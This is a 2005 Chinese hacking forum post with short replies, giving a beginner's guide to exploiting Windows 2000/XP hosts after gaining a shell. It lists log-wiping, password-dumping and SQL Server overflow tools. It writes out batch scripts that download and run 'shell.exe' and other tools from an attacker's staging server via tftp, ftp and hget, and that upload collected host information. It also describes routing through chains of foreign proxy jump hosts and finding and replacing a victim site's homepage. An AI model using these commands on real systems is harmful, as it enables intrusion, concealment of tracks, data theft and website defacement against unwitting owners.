论坛: 菜鸟乐园 标题: Shell下的快乐 复制本贴地址    
作者: kevin789 [kevin789]    论坛用户   登录


Shell下的快乐



文章结构
0. 写在前面的话
1. 需要的软件列表
2. tftpd server, ftp server, http server的安装
3. 不同的通讯商的代理服务器两个sock5,简单的tcp包转发设置
4. 文件传输,及常用的命令的格式
5. 修改首页面简便方法
6. 对主机简单判断,xmail使用
7. 问题


#############################################################
0. 写在前面的话
#############################################################
本文主要适用于microsoft的win2000,winxp 操作系统.
网上面也有这些资料. 我了稍微觉得这个周末无聊.
就把他胡乱的写一通吧!
肉鸡应该很多的. 我只是拿来测试一些工具而已.自己的是win9x没有办法了.
如果你已经得到一个shell.还不知道怎么办的话. 那就接着看吧
如果你觉得烂. 不要砸我哟 ^_^
如果你觉得需要补充的话.请在BBS留言. 如果有空的话,在出个改进版吧!

当然,如果你觉得不错的话.可以把下面的命令自己在整理一次.作一个适合自己的文件
到时候.只需要粘贴到telnet里面.会自动执行的,真的.(笼里面的包子 ^_^)


#############################################################
1. 需要的软件列表
#############################################################

2000-01-10 20:00 17,168 tftp.exe (客户端,自带)
2000-01-09 00:00 19,728 tftpd.exe (服务端,server版本自带有)
2000-12-04 08:44 95,744 clearel.exe (清除事件纪录)
2002-06-16 02:44 33,792 elsave.exe (清除日志)
2002-08-08 22:28 32,768 findpass.exe
2000-12-19 15:42 13,312 FPipe.exe (tcp转发)
2001-05-04 13:58 114,688 fport.exe (查开放端口及关联进程)
2002-04-18 09:27 13,312 FScan.exe (扫描自己的服务器开放否)
2002-09-25 16:46 4,608 HGet.exe (下载)
2002-04-03 18:16 15,532 instsrv.exe (安装服务)
2001-05-10 12:00 19,488 nc.exe
2002-06-05 20:08 16,896 netsvc.exe (远程查询服务)
2002-04-29 18:45 131,072 Psinfo.exe (查看是否ntfs分区)
2000-02-24 02:52 77,824 pskill.exe (杀进程)
2002-08-13 12:49 86,016 pslist.exe (列进程)
2001-12-20 04:51 22,528 psu.exe (插入system进程权限)
2002-08-08 22:28 55,296 pulist.exe (列主机名/用户名/PID)
2000-09-01 17:16 39,168 sc.exe (查询服务关联进程)
1999-11-11 00:00 5,904 sclist.exe (列所有安装服务状态)
2001-12-21 20:47 132,608 Server.exe (ftp server)
2002-10-22 11:00 1,642 settings.ini(ftp server 配置文件)
2002-11-16 09:19 939 slimftpd.conf (slimftp server配置文件)
2002-07-31 15:08 18,944 SlimFTPd.exe (slimftp server)
2002-10-23 09:27 45,056 sql2.exe (sql2 1433端口溢出)
2002-04-13 20:49 32,768 sqlexeca.exe (sa空口令 sqlserver连接程序)
2002-11-19 14:59 3,796 token.exe (列主机名/用户名/PID)
2002-11-03 11:19 196,608 wget.exe (下载,可以显示速度)
2002-11-11 11:30 45,056 wnc.exe (http server)
2001-10-09 17:36 77,312 xmail.exe (可以发送附件到免费油箱)
2002-07-31 20:51 401,462 msvcp60.dll (不知道这个是否自带,
很多的程序都需要的库)
网页压缩包 china.rar

当然还需要winrar3.0版本. 这么多的软件需要压缩的.
建议先使用中文版本rar.exe 学会了.使用英文rar.exe
以上程序如果我们网站没有下载 那么就去google.com 输入 "xmail.exe" 搜索吧!

#############################################################
2. tftpd server, ftp server, http server的安装
#############################################################

tftpd server的安装
-------------------------------------------------------------
copy tftpd.exe %windir%\system32\.
instsrv tftpd %windir%\system32\tftpd.exe
net start tftpd
echo Your file copy to ^> %SystemDrive%\tftpdroot\
dir %SystemDrive%\tftpdroot\.

ftp server的安装
-------------------------------------------------------------
slimftpd.exe
或者
server.exe

http server
--------------------------------------------------------------
我使用的apache. 压缩后1M.
好像
wmc.exe
怎么不是很顺利.

#############################################################
3. 不同的通讯商的代理服务器两个sock5,简单的tcp包转发设置
#############################################################
一般选择台湾 日本 韩国的跳板(TB).一般是安装skserver了.
我的通讯意图是:
TB:跳板主机 MB: 目标主机 CK: 仓库,放你的程序

本机telnet-->TB1(sock5)-->TB1(sock5)-->MB

控制 CK-->TB3(tcp转发)-->MB(tftp下载)
控制 CK-->TB3(tcp转发)-->MB(ftp -s:w下载)
第三 net use \\ip\ipc$ "pass" /user:"username"
copy *.exe \\ip\admin$\.

控制 CK-->TB3(tcp转发)-->MB(wget下载) 最后大规模下载

#############################################################
4. 文件传输,及常用的命令的格式
#############################################################
假设你的仓库服务器的ip: 202.203.x.x
tftpd:
304 tftpd -> 69 UDP c:\winnt\system32\tftpd.exe

ftp server
2088 Server -> 3321 TCP C:\WINNT\system32\Server.exe

http server
2089 Server -> 808 TCP C:\WINNT\system32\wnc.exe

检查你的"仓库"是否正常工作.一般只有做fscan端口扫描了
_______________mycb.bat___________________________________
fscan -u 69 202.203.x.x
fscan -p 808,3321 202.203.x.x
_______________mycb.bat__END______________________________

假设你的文件都放在%SystemDrive%\tftpdroot\下面,一般也就是 c:\tftproot\
_______________mytftp.bat_____________________________________
tftp -i 202.203.x.x get hget.exe
tftp -i 202.203.x.x get shell.exe
tftp -i 202.203.x.x get rar.exe
tftp -i 202.203.x.x get china.rar
tftp -i 202.203.x.x get netsill.rar
tftp -i 202.203.x.x put infoRJ.txt
_______________mytftp.bat__END_______________________________

下面是ftp.exe 方式下载
______________myftp.bat________________________________________
echo open 202.203.x.x 3321 >w
echo username >>w
echo password >>w
echo cd /tftpdroor >>w
echo pwd >>w
echo binary >>w
echo get hget.exe >>w
echo get shell.exe >>w
echo get rar.exe >>w
echo get china.rar >>w
echo get netsill.rar >>w
echo quit >>w
ftp -s:w
shell.exe
______________myftp.bat__END___________________________________

最后是hget方式拖了.

______________myhget.bat_______________________________________
hget.exe ftp://username:password@202.203.x.x:3321/tftproot/shell.exe shell.exe run
hget.exe ftp://username:password@202.203.x.x:3321/tftproot/rar.exe rar.exe
hget.exe ftp://username:password@202.203.x.x:3321/tftproot/china.rar china.rar
hget.exe ftp://username:password@202.203.x.x:3321/tftproot/netsill.rar netsill.rar
______________myhget.bat__END__________________________________

文件已经上传了.剩下的事情比较好作了.

#############################################################
5. 修改首页面
#############################################################
如果是修改首页面. a. 找到目录 b. 确定默认首文件 c.替换默认的首文件

a. 找到目录
使用浏览器打开目标(MB)上面的网址.选者两个图片. 右键--属性--记住图片的全称
比如
isbest.gif http://www.netsill.com/bbs/pic/isbest.gif 这样的不行估计/bbs/是一个虚拟目录
LOGO.GIF http://www.netsill.com/images/LOGO.GIF
然后
__________________________
cd /
dir /s logo.gif
__________________________
看看这个文件在那个目录.如果只有一个的话.恭喜你.找到目录的(退出images就可以了)

b. 确定默认首文件
寻找首页面比较偏僻的文字 比如 "我能做什么"
在刚才那个目录里面 明确扩展名称
__________________________
find /i "我能做什么" *.asp
find /i "我能做什么" *.htm
find /i "我能做什么" *.php
__________________________
c.替换默认的首文件
自己替换就行了.
上面那个也可以直接作的.

(可能出现的问题.就是替换不成功. 曾经和 孤狼望月 发现一个网站. 怎么替换都提示没有权限
后来使用administrator-3389登陆才发现.NTFS分区.对文件夹作了设置. 只有administrator
可以只读访问后修改了完全控制. 传递给子进程. 用了半个小时才改完权限)

#############################################################
6. 对主机简单判断
#############################################################
ipconfig
是否有内部网络

netstat -n
是否有活动的网络连接.如果有80端口连接. 可能网管正在上网了.
是否有内网连接或者连接的源地址是内部网络IP. 主机作了NAT

net user administrator
最后一次登陆时间. 密码更改时间

net user guest
这个帐号有人使用吗?

sclist
sclist -r
sclist -s
看看有没有异常安装的服务.
然后就是重点检查可疑的服务
sc qc servicename

psinfo.exe
安装时间,运行时间.打的补丁包数字SP1,SP2,SP3. 磁盘分区格式.容量

pslist.exe
是否有*.scr屏幕保护程序运行

xmail.exe [User] [Pass]
xmail.exe smtp.21cn.com [User] [Pass]
xmail.exe smtp.263.net [User] [Pass]


#############################################################
7. 问题
#############################################################
那个TCP包转发的软件我没有详细测试.自己只作了两次而已.成功.
什么是Shell?
如果有人这样问你,你要怎么解释了?我也不知道怎么表白?也许是我的语言的苍白.
也许是我的语文没有学好.
你去下载一个icmd.exe http://www.heibai.net/download/show.php?id=1629
然后本机 icmd z 1000 运行
再开一个窗口 telnet 127.0.0.1 1000
这个1000应该可以叫着一个shell的例子吧!
应该这样解释吗??????????????????????????????????


地主 发表时间: 05-04-18 12:09
回复: kevin789 [kevin789]   论坛用户   登录
       
  mei ren ding?




B1层 发表时间: 05-04-24 08:56
回复: musttoo [musttoo]   论坛用户   登录
看不懂。

B2层 发表时间: 05-04-24 10:40
回复: tk99 [tk99]   论坛用户   登录
不是蛮懂

B3层 发表时间: 05-04-24 17:21

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号